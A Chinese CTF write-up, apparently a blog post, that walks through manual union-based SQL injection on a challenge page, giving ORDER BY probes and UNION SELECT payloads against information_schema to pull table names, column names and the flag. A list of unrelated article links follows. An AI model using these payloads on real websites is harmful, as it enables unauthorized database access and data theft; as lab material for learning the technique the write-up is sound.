看起来像是SQL注入，先来试试。

输入1,2,3显示的是三个人成绩。

来试试是否存在注入。

输入1，正常。输入1' 错误。输入1’#正常，说明存在注入点。

首先来看下有几列从1开始试，1’ order by 4#正常，1’ order by 5#错误，说明有五列。

接下来开始使用联合查询，首先将id=-1，先手遍历一下看一下那几个表有回显：

发现这四个表都有回显，然后开始爆破表名。

得到数据库名skctf_flag，接下来爆表名：id=-1'union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema=database()#

得到两个表名 fl4g,sc  看起来fl4g像是存放flag的表，接下来开始爆字段：id=-1'union select 1,2,3,group_concat(column_name)from information_schema.columns where table_name=0x666c3467#注意最后的表名要用十六进制进行加密。

得到字段skctf_flag，开始获取flagid=-1'union select 1,2,3,skctf_flag from fl4g#

得到flag。

虽然现在工具很多，而且功能很强大，但是手注是基础，对我们理解sql注入的原理有很大的帮助，能手注还是尽量要手注的。

最新文章

1. WebApi系列~FromUri参数自动解析成实体的要求
2. MySqlHelper
3. IOS语音集成
4. Buy Tickets（线段树）
5. 启用 CORS 来解决这个问题（ajax跨域请求）
6. 如何更新Linux源
7. Ext.Ajax中scope的作用
8. Android事件处理之多点触摸与手势识别
9. 写的好帮手项目官员 - Evernote 5.4(Evernote的) 中国绿色版
10. TS流文件
11. PS 色调——老照片效果
12. asp.net core源码地址
13. DeepLearning.ai学习笔记（四）卷积神经网络 -- week4 特殊应用:人力脸识别和神经风格转换
14. Flask开发遇到的问题：BuildError: Could not build url for endpoint 'main.followers' with values ['username']. Did you mean 'main.user' instead?
15. 无需脑图 无需思维导图 看Word大纲视图
16. 使用JavaScript动态刷新页面局部内容
17. Unity&Sqlite数据库
18. 01-02 notepad++安装、配置及使用
19. jsp页面获取参数的方法（url解析、el表达式赋值、session取值）【原创】
20. jQuery一句话实现全选

热门文章

1. group by语法
2. 应用上下文webApplicationContext
3. 疑难杂症----Windows10
4. 第四周课程总结&试验报告（二）
5. py-faster-rcnn的常见错误
6. 使用回车键执行input框事件
7. mysql备份脚本并保留7天
8. 接口测试时数据格式是json，如何将响应内容转换为字典解析
9. jquery的api以及用法总结-属性/css/位置
10. 机器学习之SVM调参实例